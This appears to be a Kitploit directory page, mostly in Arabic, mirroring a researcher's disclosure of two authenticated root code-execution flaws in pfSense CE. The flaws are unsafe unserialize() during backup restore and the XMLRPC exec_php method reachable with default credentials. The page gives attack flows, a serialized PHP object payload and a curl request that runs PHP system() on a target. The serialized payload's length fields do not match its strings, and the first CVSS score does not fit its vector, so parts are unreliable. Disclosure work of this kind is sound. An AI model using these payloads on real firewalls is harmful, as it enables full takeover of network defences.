Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/privlabs/cve-2025-69690-cve-2025-69691
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubprivlabs/cve-2025-69690-cve-2025-69691

CVE-2025-69690-CVE-2025-69691

ثغرة RCE تتطلب مصادقة في Netgate pfSense CE 2.7.2 و 2.8.0

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

🔐 CVE-2025-69690 & CVE-2025-69691

تنفيذ أكواد عن بُعد (RCE) مع مصادقة في Netgate pfSense Community Edition

CVE CVE CVSS Vendor Status


📋 الملخص

الحقلالتفاصيل
الباحثNelson Adhepeau (@privlabs)
المورّدNetgate
المنتجpfSense Community Edition
الإصدارات2.7.2 و 2.8.0
النوعتنفيذ أكواد عن بُعد (RCE) مع مصادقة
الإفصاحفبراير 2026
تاريخ إشعار المورّد2 ديسمبر 2025
تاريخ تعيين CVE28 يناير 2026

⚠️ إخلاء المسؤولية

أُجري هذا البحث في بيئات معملية معزولة لأغراض تعليمية ولزيادة الوعي الأمني فقط. تم الإفصاح عن جميع النتائج بمسؤولية إلى المورّد قبل النشر. لا يشكّل هذا التقرير دعوة لمهاجمة الأنظمة الإنتاجية. الاختبار غير المصرّح به غير قانوني.


🎯 CVE-2025-69690

إلغاء تسلسل غير آمن → RCE (pfSense CE 2.7.2)

الوصف

تستدعي آلية استعادة الإعدادات في pfSense الدالة unserialize() على بيانات يتحكم بها المستخدم بدون قائمة بيضاء للفئات، أو تحقق من المدخلات، أو عزل (sandboxing).

يحقن ملف نسخة احتياطية مُعدّ بعناية، يحتوي على كائن PHP مُسلسَل خبيث، أوامر اعتباطية عبر الخاصية post_reboot_commands، والتي يتم تنفيذها عبر mwexec() بصلاحيات root كاملة.

سير الهجوم

root@kitploit:~
[Attacker] → Login as admin
           → Upload malicious .xml backup file
           → Trigger restore
           → pfSense calls unserialize() on attacker data
           → post_reboot_commands executed via mwexec()
           → [ROOT SHELL]

المكوّنات المتأثرة

  • config.php — منطق معالجة الاستعادة
  • فئة pfsense_module_installer — هدف إلغاء التسلسل غير الآمن
  • mwexec() — مستقبِل تنفيذ الأوامر

حمولة PoC

root@kitploit:~
O:23:"pfsense_module_installer":1:{
  s:17:"*post_reboot_commands";
  a:1:{
    i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
  }
}

التأثير

  • ✅ تنفيذ أوامر نظام تشغيل اعتباطية بصلاحيات root
  • ✅ تثبيت باب خلفي دائم
  • ✅ استيلاء كامل على جدار الحماية
  • ✅ استخراج بيانات الاعتماد والإعدادات

استجابة المورّد

"تم الإقرار. صُنّف على أنه إساءة استخدام إدارية موثّقة. لن يتم إصدار أي تصحيح." — Netgate


🎯 CVE-2025-69691

XMLRPC exec_php → RCE (pfSense CE 2.8.0)

الوصف

يكشف pfSense CE 2.8.0 عن طريقة XMLRPC باسم pfsense.exec_php تقوم بتنفيذ أكواد PHP اعتباطية بصلاحيات root دون تحقق، أو عزل (sandboxing)، أو أي شكل من أشكال التقييد.

نقطة النهاية:

  • ✅ مفعّلة افتراضيًا
  • ✅ قابلة للوصول عن بُعد عبر HTTPS
  • ✅ محمية فقط عبر المصادقة الأساسية (Basic Authentication)
  • ✅ قابلة للاستغلال بـبيانات اعتماد افتراضية (admin:pfsense)

سير الهجوم

root@kitploit:~
[Attacker] → Send XMLRPC request to /xmlrpc.php
           → Authenticate with admin:pfsense (default)
           → Call pfsense.exec_php with arbitrary PHP
           → Code executes as root, no sandboxing
           → [ROOT SHELL]

المكوّنات المتأثرة

  • xmlrpc.php — نقطة دخول الواجهة البرمجية (API)
  • pfsense.exec_php — تنفيذ أكواد ديناميكية غير آمن
  • طبقة BasicAuth — تحكم غير كافٍ في الوصول

إثبات المفهوم (PoC)

root@kitploit:~
curl -k -u admin:pfsense \
  -H "Content-Type: text/xml" \
  -d '<methodCall>
        <methodName>pfsense.exec_php</methodName>
        <params>
          <param>
            <value><string>system("id");</string></value>
          </param>
        </params>
      </methodCall>' \
  https://<target>/xmlrpc.php

التأثير

  • ✅ اختراق كامل بصلاحيات root عن بُعد
  • ✅ قراءة/كتابة ملفات اعتباطية
  • ✅ نشر باب خلفي
  • ✅ التلاعب بقواعد جدار الحماية
  • ✅ استخراج جميع بيانات الاعتماد والإعدادات

استجابة المورّد

"تم الإقرار. صُنّف على أنه سلوك متوقّع للمستخدمين الموثّقين. لا توجد خطة لإصدار تصحيح." — Netgate


📅 الخط الزمني

root@kitploit:~
November 2025     →  Vulnerabilities discovered
December 2, 2025  →  Responsible disclosure to Netgate
                  →  Vendor acknowledged, no patch planned
January 28, 2026  →  CVE IDs assigned by MITRE
February 2026     →  Public disclosure

🔗 المراجع

  • 🔴 CVE-2025-69690 على cve.org
  • 🔴 CVE-2025-69691 على cve.org
  • 📧 الإفصاح الكامل: [email protected]

👤 الباحث

Nelson Adhepeau — باحث أمني مستقل

LinkedIn GitHub

📧 [email protected]

تنزيل الأداة
الحقلالقيمة
CVSS v3.18.8 (عالي)
المتجهAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWECWE-502, CWE-915
نوع الهجوممصادَق عليه (مدير)
المكوّنآلية النسخ الاحتياطي/الاستعادة
الحقلالقيمة
CVSS v3.19.9 (حرج)
المتجهAV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWECWE-284, CWE-915
نوع الهجوممصادَق عليه (عن بُعد، مصادقة أساسية)
المكوّنواجهة XMLRPC البرمجية — pfsense.exec_php